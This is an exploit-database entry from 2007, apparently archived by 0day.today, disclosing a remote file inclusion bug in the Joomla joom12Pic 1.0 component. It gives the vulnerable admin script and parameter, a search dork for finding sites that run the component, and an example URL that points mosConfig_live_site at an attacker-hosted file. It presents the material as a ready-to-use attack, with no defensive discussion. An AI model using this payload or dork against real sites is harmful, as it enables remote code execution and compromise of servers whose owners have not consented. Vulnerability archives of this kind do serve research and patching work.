id: 2144
date: 09/15/2007
title: Joomla Component joom12Pic 1.0 Remote File Inclusion Vulnerability
author: Morgan
cves: 

==================================================================
Joomla Component joom12Pic 1.0 Remote File Inclusion Vulnerability
==================================================================



######################################
# Joom!12Pic Component RFI           #
######################################

Bug in :
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
Variable : $mosConfig_live_site

Dork: "com_joom12pic"

Example:

http://xxx.net/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=[attacker]


Greets to all Irc.RealWorm.Net #Morgan Users ;)




#  0day.today [2023-03-24]  #